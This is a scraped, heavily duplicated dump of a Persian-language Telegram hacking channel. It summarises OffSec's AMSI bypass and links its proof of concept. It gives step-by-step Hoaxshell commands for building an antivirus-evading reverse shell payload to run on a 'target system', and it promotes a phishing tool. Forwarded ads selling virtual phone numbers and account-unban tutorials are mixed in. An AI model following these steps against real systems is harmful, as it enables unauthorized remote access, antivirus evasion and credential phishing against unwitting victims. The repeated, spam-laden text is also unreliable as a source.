آسیب پذیری که منجر به AMSI BYPASS می شود
حالا اصلا AMSI چیه؟
معرفی آسیبپذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامههای امنیتی مختلف (مانند نرمافزارهای آنتی ویروس یا ضد بدافزار) را در برنامهها و نرمافزارها ادغام میکند و رفتار آنها را قبل از اجرا بررسی میکند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیبپذیری را تشریح میکنیم و نشان میدهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیبپذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.
اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/
POC - https://github.com/V-i-x-x/AMSI-BYPASS
#NULL🖤
https://t.me/Kali_Linux_NULL
حالا اصلا AMSI چیه؟
معرفی آسیبپذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامههای امنیتی مختلف (مانند نرمافزارهای آنتی ویروس یا ضد بدافزار) را در برنامهها و نرمافزارها ادغام میکند و رفتار آنها را قبل از اجرا بررسی میکند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیبپذیری را تشریح میکنیم و نشان میدهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیبپذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.
اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/
POC - https://github.com/V-i-x-x/AMSI-BYPASS
#NULL🖤
https://t.me/Kali_Linux_NULL
OffSec
AMSI Write Raid Bypass Vulnerability | OffSec
In this blog post, we'll introduce a new bypass technique designed to bypass AMSI without the VirtualProtect API and without changing memory protection.
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
ابزار Hoaxshell 🕷
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀
➖➖➖➖➖➖➖➖➖
این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀
sudo python3 hoaxshell.py -s <your_ip>
➖➖➖➖➖➖➖➖➖
بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش و باید توی PowerShell یا CMD سیستم مورد نظر وارد کنید !⚡
⚡رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell 🟦
ببینم چه میکنید .☠️
📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱
🔤🔤🔤🔤🔤🔤 🔤🔤🔤🔤
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀
➖➖➖➖➖➖➖➖➖
این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀
sudo python3 hoaxshell.py -s <your_ip>
➖➖➖➖➖➖➖➖➖
بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش و باید توی PowerShell یا CMD سیستم مورد نظر وارد کنید !⚡
⚡رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell 🟦
ببینم چه میکنید .☠️
📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱
🔤🔤🔤🔤🔤🔤 🔤🔤🔤🔤
GitHub
GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish…
A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell. - t3l3machus/hoaxshell
Forwarded from VIP
شماره مجازی انگلیس ( پرمیوم )
+44 73896**776
اکانت یک ساله دستمه تضمینه
پرمیومش دو ماه وقت داره
قابلیت چنچ داره و ایمیلی هستش
کارت به کارت فقط
@Cadillacm < جهت خرید پیام بدید
اکانت شماره مجازی جاهای دیگه هم موجوده
+44 73896**776
اکانت یک ساله دستمه تضمینه
پرمیومش دو ماه وقت داره
قابلیت چنچ داره و ایمیلی هستش
کارت به کارت فقط
@Cadillacm < جهت خرید پیام بدید
اکانت شماره مجازی جاهای دیگه هم موجوده
Forwarded from ᴛᴀʙ ʟɪꜱᴛ ꜱᴛᴇᴠᴇɴ ᴋɴɪɢʜᴛ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from زاپاس
اک یه نوب آیدی نداشت❤️
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
خام بود❤️
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from ᴛᴀʙ ʟɪꜱᴛ ꜱᴛᴇᴠᴇɴ ᴋɴɪɢʜᴛ
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from NULL (mahdi)
Forwarded from زاپاس
خام بود❤️
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته میشود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password
https://github.com/davenisc/thief_raccoon
#NULL🖤
https://t.me/Kali_Linux_NULLls
https://github.com/davenisc/thief_raccoon
#NULL🖤
https://t.me/Kali_Linux_NULLls